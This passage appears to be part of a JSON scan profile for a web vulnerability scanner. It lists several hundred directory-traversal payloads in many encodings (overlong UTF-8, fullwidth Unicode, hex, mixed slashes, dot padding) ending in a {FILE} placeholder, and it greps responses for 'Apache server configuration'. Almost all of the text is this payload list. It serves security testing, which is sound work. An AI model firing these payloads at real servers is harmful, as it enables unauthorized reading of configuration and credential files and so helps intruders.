"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,..0x2f{FILE}",
"true,..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,..0x5c{FILE}",
"true,..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,///%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,\\\\\\%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..//{FILE}",
"true,..//..//{FILE}",
"true,..//..//..//{FILE}",
"true,..//..//..//..//{FILE}",
"true,..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//..//{FILE}",
"true,..///{FILE}",
"true,..///..///{FILE}",
"true,..///..///..///{FILE}",
"true,..///..///..///..///{FILE}",
"true,..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///..///{FILE}",
"true,..\\\\{FILE}",
"true,..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,./\\/./{FILE}",
"true,./\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,./../{FILE}",
"true,./.././../{FILE}",
"true,./.././.././../{FILE}",
"true,./.././.././.././../{FILE}",
"true,./.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././.././../{FILE}",
"true,.\\..\\{FILE}",
"true,.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.//..//{FILE}",
"true,.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,../{FILE}",
"true,../..//{FILE}",
"true,../..//../{FILE}",
"true,../..//../..//{FILE}",
"true,../..//../..//../{FILE}",
"true,../..//../..//../..//{FILE}",
"true,../..//../..//../..//../{FILE}",
"true,../..//../..//../..//../..//{FILE}",
"true,..\\{FILE}",
"true,..\\..\\\\{FILE}",
"true,..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
"true,..///{FILE}",
"true,../..///{FILE}",
"true,../..//..///{FILE}",
"true,../..//../..///{FILE}",
"true,../..//../..//..///{FILE}",
"true,../..//../..//../..///{FILE}",
"true,../..//../..//../..//..///{FILE}",
"true,../..//../..//../..//../..///{FILE}",
"true,..\\\\\\{FILE}",
"true,..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,Apache server configuration"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
